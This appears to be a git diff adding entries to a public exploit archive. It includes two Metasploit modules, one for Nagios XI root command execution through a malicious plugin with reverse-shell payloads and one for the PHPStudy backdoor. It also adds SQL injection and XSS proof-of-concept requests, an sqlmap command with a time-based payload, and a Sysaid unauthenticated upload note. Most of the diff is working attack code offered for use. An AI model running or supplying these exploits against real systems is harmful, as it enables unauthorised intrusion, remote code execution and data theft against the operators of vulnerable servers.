diff --git a/exploits/java/webapps/48188.txt b/exploits/java/webapps/48188.txt
new file mode 100644
index 000000000..b937f633e
--- /dev/null
+++ b/exploits/java/webapps/48188.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Sysaid 20.1.11 b26 - Remote Command Execution
+# Google Dork: intext:"Help Desk Software by SysAid "
+# Date: 2020-03-09
+# Exploit Author: Ahmed Sherif
+# Vendor Homepage: https://www.sysaid.com/free-help-desk-software
+# Software Link: [https://www.sysaid.com/free-help-desk-software
+# Version: Sysaid v20.1.11 b26
+# Tested on: Windows Server 2016
+# CVE : None
+
+GhostCat Attack
+
+The default
+installation of Sysaid is enabling the exposure of AJP13 protocol which is used
+by tomcat instance, this vulnerability has been released recently on
+different blogposts
+.
+
+
+*Proof-of-Concept*
+
+[image: image.png]
+
+The
+attacker would be able to exploit the vulnerability and read the Web.XML of
+Sysaid.
+Unauthenticated File Upload
+
+It was
+found on the Sysaid application that an attacker would be able to upload files
+without authenticated by directly access the below link:
+
+http://REDACTED:8080/UploadIcon.jsp?uploadChatFile=true&parent=
+
+
+
+In the above screenshot, it shows that an attacker can execute commands
+in the system without any prior authentication to the system.
\ No newline at end of file
diff --git a/exploits/linux/remote/48191.rb b/exploits/linux/remote/48191.rb
new file mode 100755
index 000000000..52b5f42fb
--- /dev/null
+++ b/exploits/linux/remote/48191.rb
@@ -0,0 +1,294 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Nagios XI Authenticated Remote Command Execution',
+ 'Description' => %q{
+ This module exploits a vulnerability in Nagios XI before 5.6.6 in
+ order to execute arbitrary commands as root.
+
+ The module uploads a malicious plugin to the Nagios XI server and then
+ executes this plugin by issuing an HTTP GET request to download a
+ system profile from the server. For all supported targets except Linux
+ (cmd), the module uses a command stager to write the exploit to the
+ target via the malicious plugin. This may not work if Nagios XI is
+ running in a restricted Unix environment, so in that case the target
+ must be set to Linux (cmd). The module then writes the payload to the
+ malicious plugin while avoiding commands that may not be supported.
+
+ Valid credentials for a user with administrative privileges are
+ required. This module was successfully tested on Nagios XI 5.6.5
+ running on CentOS 7. The module may behave differently against older
+ versions of Nagios XI. See the documentation for more information.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Jak Gibb', # https://github.com/jakgibb/ - Discovery and exploit
+ 'Erik Wynter' # @wyntererik - Metasploit
+ ],
+ 'References' =>
+ [
+ ['CVE', '2019-15949'],
+ ['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'] #original PHP exploit
+ ],
+ 'Payload' => { 'BadChars' => "\x00" },
+ 'Targets' =>
+ [
+ [ 'Linux (x86)', {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux',
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
+ }
+ } ],
+ [ 'Linux (x64)', {
+ 'Arch' => ARCH_X64,
+ 'Platform' => 'linux',
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+ }
+ } ],
+ [ 'Linux (cmd)', {
+ 'Arch' => ARCH_CMD,
+ 'Platform' => 'unix',
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'cmd/unix/reverse_bash'
+ },
+ 'Payload' => {
+ 'Append' => ' & disown', # the payload must be disowned after execution, otherwise cleanup fails
+ 'BadChars' => "\""
+ }
+ } ]
+ ],
+ 'Privileged' => true,
+ 'DisclosureDate' => 'Jul 29 2019',
+ 'DefaultOptions' => {
+ 'RPORT' => 80,
+ 'HttpClientTimeout' => 2, #This is needed to close the connection to the server following the system profile download request.
+ 'WfsDelay' => 10
+ },
+ 'DefaultTarget' => 1))
+ register_options [
+ OptString.new('TARGETURI', [true, 'Base path to NagiosXI', '/']),
+ OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),
+ OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
+ ]
+
+ register_advanced_options [
+ OptBool.new('ForceExploit', [false, 'Override check result', false])
+ ]
+ import_target_defaults
+ end
+
+ def check
+ vprint_status("Running check")
+
+ #visit Nagios XI login page to obtain the nsp value required for authentication
+ res = send_request_cgi 'uri' => normalize_uri(target_uri.path, '/nagiosxi/login.php')
+
+ unless res
+ return CheckCode::Unknown('Connection failed')
+ end
+
+ unless res.code == 200 && res.body.include?('Nagios XI')
+ return CheckCode::Safe('Target is not a Nagios XI application.')
+ end
+
+ @nsp = res.body.scan(/nsp_str = "([a-z0-9]+)/).flatten.first rescue ''
+
+ if @nsp.to_s.eql? ''
+ return CheckCode::NoAccess, 'Could not retrieve nsp value, making authentication impossible.'
+ end
+
+ #Attempt to authenticate
+ @username = datastore['USERNAME']
+ password = datastore['PASSWORD']
+ cookie = res.get_cookies.delete_suffix(';') #remove trailing semi-colon
+
+ auth_res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, '/nagiosxi/login.php'),
+ 'method' => 'POST',
+ 'cookie' => cookie,
+ 'vars_post' => {
+ nsp: @nsp,
+ page: 'auth',
+ debug: '',
+ pageopt: 'login',
+ username: @username,
+ password: password,
+ loginButton: ''
+ }
+ })
+
+ unless auth_res
+ fail_with Failure::Unreachable, 'Connection failed'
+ end
+
+ unless auth_res.code == 302 && auth_res.headers['Location'] == "index.php"
+ fail_with Failure::NoAccess, 'Authentication failed. Please provide a valid username and password.'
+ end
+
+ #Check Nagios XI version - this requires a separate request because following the redirect doesn't work
+ @cookie = auth_res.get_cookies.delete_suffix(';') #remove trailing semi-colon
+ @cookie = @cookie.split().last #app returns 3 cookies, we need only the last one
+ version_check = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, '/nagiosxi/index.php'),
+ 'method' => 'GET',
+ 'cookie' => @cookie,
+ 'nsp' => @nsp
+ })
+
+ unless version_check
+ fail_with Failure::Unreachable, 'Connection failed'
+ end
+
+ unless version_check.code == 200 && version_check.body.include?('Home Dashboard')
+ fail_with Failure::NoAccess, 'Authentication failed. Please provide a valid username and password.'
+ end
+
+ @version = version_check.body.scan(/product=nagiosxi&version=(\d+\.\d+\.\d+)/).flatten.first rescue ''
+ if @version.to_s.eql? ''
+ return CheckCode::Detected('Could not determine Nagios XI version.')
+ end
+
+ @version = Gem::Version.new @version
+
+ unless @version <= Gem::Version.new('5.6.5')
+ return CheckCode::Safe("Target is Nagios XI with version #{@version}.")
+ end
+
+ CheckCode::Appears("Target is Nagios XI with version #{@version}.")
+ end
+
+ def check_plugin_permissions
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, '/nagiosxi/admin/monitoringplugins.php'),
+ 'method' => 'GET',
+ 'cookie' => @cookie,
+ 'nsp' => @nsp
+ })
+
+ unless res
+ fail_with Failure::Unreachable, 'Connection failed'
+ end
+
+ unless res.code == 200 && res.body.include?('Manage Plugins')
+ fail_with(Failure::NoAccess, "The user #{@username} does not have permission to edit plugins, which is required for the exploit to work.")
+ end
+
+ @plugin_nsp = res.body.scan(/nsp_str = "([a-z0-9]+)/).flatten.first rescue ''
+ if @plugin_nsp.to_s.eql? ''
+ fail_with Failure::NoAccess, 'Failed to obtain the nsp value required for the exploit to work.'
+ end
+
+ @plugin_cookie = res.get_cookies.delete_suffix(';') #remove trailing semi-colon
+ end
+
+ def execute_command(cmd, opts = {})
+ print_status("Uploading malicious 'check_ping' plugin...")
+ boundary = rand_text_numeric(14)
+ post_data = "-----------------------------#{boundary}\n"
+ post_data << "Content-Disposition: form-data; name=\"upload\"\n\n1\n"
+ post_data << "-----------------------------#{boundary}\n"
+ post_data << "Content-Disposition: form-data; name=\"nsp\"\n\n"
+ post_data << "#{@plugin_nsp}\n"
+ post_data << "-----------------------------#{boundary}\n"
+ post_data << "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\n\n20000000\n"
+ post_data << "-----------------------------#{boundary}\n"
+ post_data << "Content-Disposition: form-data; name=\"uploadedfile\"; filename=\"check_ping\"\n" #the exploit doesn't work with a random filename
+ post_data << "Content-Type: text/plain\n\n"
+ post_data << "#{cmd}\n"
+ post_data << "-----------------------------#{boundary}--\n"
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, '/nagiosxi/admin/monitoringplugins.php'),
+ 'method' => 'POST',
+ 'ctype' => "multipart/form-data; boundary=---------------------------#{boundary}", #this needs to be specified here, otherwise the default value is sent in the header
+ 'cookie' => @plugin_cookie,
+ 'data' => post_data
+ })
+
+ unless res
+ fail_with Failure::Unreachable, 'Upload failed'
+ end
+
+ unless res.code == 200 && res.body.include?('New plugin was installed successfully')
+ fail_with Failure::Unknown, 'Failed to upload plugin.'
+ end
+
+ @plugin_installed = true
+ end
+
+ def execute_payload #This request will timeout. It has to, for the exploit to work.
+ print_status("Executing plugin...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, '/nagiosxi/includes/components/profile/profile.php'),
+ 'method' => 'GET',
+ 'cookie' => @cookie,
+ 'vars_get' => { cmd: 'download' }
+ })
+ end
+
+ def cleanup()
+ return unless @plugin_installed
+
+ print_status("Deleting malicious 'check_ping' plugin...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, '/nagiosxi/admin/monitoringplugins.php'),
+ 'method' => 'GET',
+ 'cookie' => @plugin_cookie,
+ 'vars_get' => {
+ delete: 'check_ping',
+ nsp: @plugin_nsp
+ }
+ })
+
+ unless res
+ print_warning("Failed to delete the malicious 'check_ping' plugin: Connection failed. Manual cleanup is required.")
+ return
+ end
+
+ unless res.code == 200 && res.body.include?('Plugin deleted')
+ print_warning("Failed to delete the malicious 'check_ping' plugin. Manual cleanup is required.")
+ return
+ end
+
+ print_good("Plugin deleted.")
+ end
+
+ def exploit
+ unless [CheckCode::Detected, CheckCode::Appears].include? check
+ unless datastore['ForceExploit']
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+ end
+ print_warning 'Target does not appear to be vulnerable'
+ end
+
+ if @version
+ print_status("Found Nagios XI application with version #{@version}.")
+ end
+
+ check_plugin_permissions
+ vprint_status("User #{@username} has the required permissions on the target.")
+
+ if target.arch.first == ARCH_CMD
+ execute_command(payload.encoded)
+ message = "Waiting for the payload to connect back..."
+ else
+ execute_cmdstager(background: true)
+ message = "Waiting for the plugin to request the final payload..."
+ end
+ print_good("Successfully uploaded plugin.")
+ execute_payload
+ print_status "#{message}"
+ end
+end
\ No newline at end of file
diff --git a/exploits/multiple/local/48187.txt b/exploits/multiple/local/48187.txt
new file mode 100644
index 000000000..17ae14fb6
--- /dev/null
+++ b/exploits/multiple/local/48187.txt
@@ -0,0 +1,3 @@
+So I’ve been holding onto this neat little gem of a .bsp that has four bytes very close to the end of the file that controls the memory allocator. See above picture. Works on all supported operating systems last I checked (so Linux, Windows, and macOS), even after a few years.
+
+Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48187.bsp
\ No newline at end of file
diff --git a/exploits/php/remote/48192.rb b/exploits/php/remote/48192.rb
new file mode 100755
index 000000000..7c688696e
--- /dev/null
+++ b/exploits/php/remote/48192.rb
@@ -0,0 +1,73 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "PHPStudy Backdoor Remote Code execution",
+ 'Description' => %q{
+ This module can detect and exploit the backdoor of PHPStudy.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Dimensional', #POC
+ 'Airevan' #Metasploit Module
+ ],
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ ['PHPStudy 2016-2018', {}]
+ ],
+ 'References' =>
+ [
+ ['URL', 'https://programmer.group/using-ghidra-to-analyze-the-back-door-of-phpstudy.html']
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Sep 20 2019",
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path', '/'])
+ ])
+ end
+ def check
+ uri = target_uri.path
+ fingerprint = Rex::Text.rand_text_alpha(8)
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(uri, 'index.php'),
+ 'headers' => {
+ 'Accept-Encoding' => 'gzip,deflate',
+ 'Accept-Charset' => Rex::Text.encode_base64("echo '#{fingerprint}';")
+ }
+ })
+
+ if res && res.code == 200 && res.body.to_s.include?(fingerprint)
+ return Exploit::CheckCode::Appears
+ else
+ return Exploit::CheckCode::Safe
+ end
+ end
+ def exploit
+ uri = target_uri.path
+ print_good("Sending shellcode")
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(uri, 'index.php'),
+ 'headers' => {
+ 'Accept-Encoding' => 'gzip,deflate',
+ 'Accept-Charset' => Rex::Text.encode_base64(payload.encoded)
+ }
+ })
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/48177.txt b/exploits/php/webapps/48177.txt
index e523d7736..6246c0928 100644
--- a/exploits/php/webapps/48177.txt
+++ b/exploits/php/webapps/48177.txt
@@ -1,6 +1,6 @@
-# Exploit Title: 60CycleCMS 2.5.2 - 'news.php' SQL Injection
+# Exploit Title: 60CycleCMS - 'news.php' Multiple vulnerability
# Google Dork: N/A
-# Date: 2020-03-07
+# Date: 2020-02-10
# Exploit Author: Unkn0wn
# Vendor Homepage: http://davidvg.com/
# Software Link: https://www.opensourcecms.com/60cyclecms
@@ -15,53 +15,49 @@ in file /common/lib.php Line 64 -73
*
function getCommentsLine($title)
{
-=09$title =3D addslashes($title);
-=09$query =3D "SELECT `timestamp` FROM `comments` WHERE entry_id=3D '$title=
-'";
-=09// query MySQL server
-=09$result=3Dmysql_query($query) or die("MySQL Query fail: $query");=09
-=09$numComments =3D mysql_num_rows($result);
-=09$encTitle =3D urlencode($title);
-=09return '' . $num=
-Comments . ' comments';=09
+$title = addslashes($title);
+$query = "SELECT `timestamp` FROM `comments` WHERE entry_id= '$title'";
+// query MySQL server
+$result=mysql_query($query) or die("MySQL Query fail: $query");
+$numComments = mysql_num_rows($result);
+$encTitle = urlencode($title);
+return '' . $numComments . ' comments';
}
lib.php line 44:
*
-=09$query =3D "SELECT `timestamp`,`author`,`text` FROM `comments` WHERE `en=
-try_id` =3D'$title' ORDER BY `timestamp` ASC";
+$query = "SELECT `timestamp`,`author`,`text` FROM `comments` WHERE `entry_id` ='$title' ORDER BY `timestamp` ASC";
*
*
news.php line 3:
*
require 'common/lib.php';
-*=20
+*
Then in line 15 return query us:
*
-$query =3D "SELECT MAX(`timestamp`) FROM `entries
+$query = "SELECT MAX(`timestamp`) FROM `entries
*
-http://127.0.0.1/news.php?title=3D$postName[SQL Injection]
+http://127.0.0.1/news.php?title=$postName[SQL Injection]
----------------------------
Cross Site-Scripting vulnerability:
File news.php in line: 136-138 :
*
-$ltsu =3D $_GET["ltsu"];
-$etsu =3D $_GET["etsu"];
-$post =3D $_GET["post"];
+$ltsu = $_GET["ltsu"];
+$etsu = $_GET["etsu"];
+$post = $_GET["post"];
*
get payload us and printEnerty.php file in line 26-27:
*
- echo 'Older=
- >';
- echo 'Oldest &g=
-t;>|';=20
+ echo 'Older >';
+ echo 'Oldest >>|';
*
print it for us!
-http://127.0.0.1/index.php?etsu=3D[XSS Payloads]
-http://127.0.0.1/index.php?ltsu=3D[XSS Payloads]
+http://127.0.0.1/index.php?etsu=[XSS Payloads]
+http://127.0.0.1/index.php?ltsu=[XSS Payloads]
----------------------------------------------------------
-
+# Contact : 0x9a@tuta.io
+# Visit: https://t.me/l314XK205E
# @ 2010 - 2020
# Underground Researcher
\ No newline at end of file
diff --git a/exploits/php/webapps/48189.txt b/exploits/php/webapps/48189.txt
new file mode 100644
index 000000000..9bbff9866
--- /dev/null
+++ b/exploits/php/webapps/48189.txt
@@ -0,0 +1,34 @@
+# Exploit Title: YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2020-03-10
+# Exploit Author: En
+# Vendor Homepage: https://github.com/yzmcms/yzmcms
+# Software Link: https://github.com/yzmcms/yzmcms
+# Version: V5.5
+# Category: Web Application
+# Patched Version: unpatched
+# Tested on: Win10x64
+# Platform: PHP
+# CVE : N/A
+#Exploit Author: En_dust
+
+#Description:
+#The add function defined in the Application/link/controller/link.class.php file does not filter the ‘url’ parameter, causing malicious code to be executed.
+
+
+#PoC:
+POST /yzmcms/link/link/add.html HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://127.0.0.1/yzmcms/link/link/add.html
+Content-Length: 130
+Cookie: CNZZDATA1261218610=2106045875-1559549499-%7C1569374982; PHPSESSID=fr095t87brjfc0l7d7sgj8oml4; yzmphp_adminid=45dfDWXXjGQg2Ce7Yg7oJZbld7iy8SN43sy2SKjq; yzmphp_adminname=7e49R0HXcjLHqBu5wgd9vXbD_D-Bq3Uq8TLw5UNpi8lIAw
+DNT: 1
+Connection: close
+
+name=evalWebsite&url=javascript%3Aalert(%2FXSS%2F)&username=&email=&linktype=0&logo=&typeid=0&msg=&listorder=1&status=1&dosubmit=1
\ No newline at end of file
diff --git a/exploits/php/webapps/48190.txt b/exploits/php/webapps/48190.txt
new file mode 100644
index 000000000..7df6fc954
--- /dev/null
+++ b/exploits/php/webapps/48190.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Persian VIP Download Script 1.0 - 'active' SQL Injection
+# Data: 2020-03-09
+# Exploit Author: S3FFR
+# Vendor HomagePage: http://download.freescript.ir/scripts/Persian-VIP-Download(FreeScript.ir).zip
+# Version: = 1.0 [Final Version]
+# Tested on: Windows,Linux
+# Google Dork: N/A
+
+
+=======================
+Vulnerable Page:
+
+/cart_edit.php
+
+=======================
+
+Vulnerable Source:
+
+89: mysql_query $user_p = mysql_fetch_array(mysql_query("SELECT * FROM `users` where id='$active'"));
+71: $active = $_GET['active'];
+
+======================
+sqlmap:
+
+sqlmap -u "http://target.com/cart_edit.php?active=1" -p active --cookie=[COOKIE] --technique=T --dbs
+=======================
+
+Testing Method :
+
+ - time-based blind
+
+Parameter: active (GET)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: active=1' AND (SELECT 4169 FROM (SELECT(SLEEP(5)))wAin) AND 'zpth'='zpth
+
+========================
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 592411073..5ec3ec7e6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10986,6 +10986,7 @@ id,file,description,date,author,type,platform,port
48174,exploits/windows/local/48174.txt,"Deep Instinct Windows Agent 1.2.29.0 - 'DeepMgmtService' Unquoted Service Path",2020-03-06,"Oscar Flores",local,windows,
48180,exploits/windows/local/48180.cpp,"Microsoft Windows - 'WizardOpium' Local Privilege Escalation",2020-03-03,piotrflorczyk,local,windows,
48185,exploits/linux/local/48185.rb,"OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)",2020-03-09,Metasploit,local,linux,
+48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18036,6 +18037,8 @@ id,file,description,date,author,type,platform,port
48183,exploits/multiple/remote/48183.rb,"Google Chrome 72 and 73 - Array.map Out-of-Bounds Write (Metasploit)",2020-03-09,Metasploit,remote,multiple,
48184,exploits/multiple/remote/48184.rb,"Google Chrome 67_ 68 and 69 - Object.create Type Confusion (Metasploit)",2020-03-09,Metasploit,remote,multiple,
48186,exploits/multiple/remote/48186.rb,"Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)",2020-03-09,Metasploit,remote,multiple,
+48191,exploits/linux/remote/48191.rb,"Nagios XI - Authenticated Remote Command Execution (Metasploit)",2020-03-10,Metasploit,remote,linux,
+48192,exploits/php/remote/48192.rb,"PHPStudy - Backdoor Remote Code execution (Metasploit)",2020-03-10,Metasploit,remote,php,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42449,3 +42452,6 @@ id,file,description,date,author,type,platform,port
48166,exploits/php/webapps/48166.txt,"UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read",2020-03-04,NgoAnhDuc,webapps,php,
48176,exploits/multiple/webapps/48176.py,"ManageEngine Desktop Central - 'FileStorage getChartImage' Deserialization / Unauthenticated Remote Code Execution",2019-12-12,mr_me,webapps,multiple,
48179,exploits/php/webapps/48179.txt,"Sentrifugo HRMS 3.2 - 'id' SQL Injection",2020-03-09,minhnb,webapps,php,
+48188,exploits/java/webapps/48188.txt,"Sysaid 20.1.11 b26 - Remote Command Execution",2020-03-10,"Ahmed Sherif",webapps,java,
+48189,exploits/php/webapps/48189.txt,"YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting",2020-03-10,En_dust,webapps,php,
+48190,exploits/php/webapps/48190.txt,"Persian VIP Download Script 1.0 - 'active' SQL Injection",2020-03-10,S3FFR,webapps,php,